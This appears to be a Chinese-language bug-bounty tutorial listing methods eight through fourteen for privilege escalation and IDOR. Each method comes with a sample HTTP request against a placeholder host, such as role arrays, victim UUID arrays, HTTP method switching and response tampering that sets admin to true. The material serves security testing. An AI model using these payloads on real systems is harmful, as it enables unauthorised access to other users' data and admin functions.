前言
本文为权限升级相关系列的第二弹,前文有:
正文
第八种方法
尝试使用分隔符,例如|
,%20
或者,带角色的参数来获得权限升级
POST /privilege-escalation HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number Role=admin,user
第九种方法
尝试更改Content-Type类型为application/json,并且插入uuid作为数组,例如:{"UUID":["victim-UUID","me-UUID"]}
POST /idor HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/json Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number {"UUID":["victim-UUID","me-UUID"]}
第十种方法
尝试更改Content-Type类型为application/json,并且以数组的形式插入角色值,比如{"Role":["admin","user"]}
会获得权限提升
POST /privilege-escalation HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/json Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number {"Role":["admin","user"]}
第十一种方法
尝试将带有UUID参数的方法改为POST、GET、PUT或DELETE等。
GET /idor?uuid=Victim-UUID HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com
第十二种方法
尝试将带有角色参数的方法改为POST、GET、PUT或DELETE等。
GET /privilege-escalation?Role=admin HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com
第十三种方法
输入受害者UUID,然后尝试操作响应,比方说将原来响应中为错误的信息改为正确的,可能会绕过权限
HTTP/1.1 200 OK Access-Control-Allow-Origin: https://www.company.com Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 Content-Length: length { "msg" : "Right To Do Next Action" }
第十四种方法
尝试通过将false更改为true等响应中的操作来获得权限升级
HTTP/1.1 200 OK Access-Control-Allow-Origin: https://www.company.com Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 Content-Length: length { "admin" : "true" }
参考
https://twitter.com/GodfatherOrwa/status/1438162075218550792